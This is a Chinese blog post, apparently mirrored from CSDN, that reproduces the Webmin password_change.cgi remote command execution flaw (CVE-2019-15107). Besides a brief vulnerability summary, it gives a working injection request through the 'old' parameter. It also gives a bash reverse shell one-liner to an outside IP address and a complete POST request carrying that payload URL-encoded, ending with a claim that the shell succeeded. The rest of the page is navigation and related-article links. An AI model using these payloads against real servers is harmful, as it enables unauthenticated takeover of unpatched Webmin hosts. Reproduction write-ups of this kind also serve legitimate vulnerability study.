码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • webmin远程命令执行漏洞(CVE-2019-15107)


    漏洞概述
    1.漏洞编号:CVE-2019-15107
    2.漏洞描述:该漏洞允许恶意第三方在缺少输入验证的情况下而执行恶意代码
    该漏洞由于password_change.cgi文件在重置密码功能中存在一个代码执行漏洞,该漏洞允许恶意第三方在缺少输入验证的情况下而执行恶意代码
    3、受影响的版本:Webmin<=1.920
    4,漏洞利用条件:版本满足要求,且服务器的配置文件允许修改密码时,在不知道webmin的用户和密码条件下,可以任意执行代码。
    漏洞复现
    https://10.95.14.161:26163/


    漏洞验证
    https://10.95.14.161:62680/password_change.cgi
    user=rootxx&pam=&expired=2&old=text|ls&new1=test2&new2=test2


    反弹shell
    bash -c "bash -i >& /dev/tcp/43.138.56.101/4444 0>&1"

    1. POST /password_change.cgi HTTP/1.1
    2. Host: 10.95.14.161:62680
    3. Cookie: redirect=1; testing=1
    4. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0
    5. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    6. Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    7. Accept-Encoding: gzip, deflate
    8. Upgrade-Insecure-Requests: 1
    9. Sec-Fetch-Dest: document
    10. Sec-Fetch-Mode: navigate
    11. Sec-Fetch-Site: none
    12. Sec-Fetch-User: ?1
    13. Te: trailers
    14. Referer: https://10.95.14.161:62680/session_login.cgi
    15. Connection: close
    16. Content-Length: 138
    17. user=rootxx&pam=&expired=2&old=bash%20-c%20%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F43.138.56.101%2F1099%200%3E%261%22&new1=test2&new2=test2
    18. ​


    反弹shell成功

     

    若有收获,就点个赞吧

  • 相关阅读:
    vue.js具名插槽
    C和指针 第13章 高级指针话题 13.5 字符串常量
    MSDP概述
    负载均衡的常见实现方式
    思考-生涯思考-GPT-5对人们的影响
    泛微金融行业方案合集,推动金融行业数字化转型
    0.o?让我看看怎么个事儿之SpringBoot自动配置
    TCP服务端和客户端编程流程+代码详细解析(linux:c语言)
    Java基础之《Ajax+JQuery(JavaEE开发进阶Ⅱ)》—JQuery DOM操作(2)
    【C++ STL】-- priority_queue底层原理、使用、模拟实现
  • 原文地址:https://blog.csdn.net/m0_49025459/article/details/128204383
  • 最新文章
  • 攻防演习之三天拿下官网站群
    数据安全治理学习——前期安全规划和安全管理体系建设
    企业安全 | 企业内一次钓鱼演练准备过程
    内网渗透测试 | Kerberos协议及其部分攻击手法
    0day的产生 | 不懂代码的"代码审计"
    安装scrcpy-client模块av模块异常,环境问题解决方案
    leetcode hot100【LeetCode 279. 完全平方数】java实现
    OpenWrt下安装Mosquitto
    AnatoMask论文汇总
    【AI日记】24.11.01 LangChain、openai api和github copilot
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1
正则表达式工具 cron表达式工具 密码生成工具

京公网安备 11010502049817号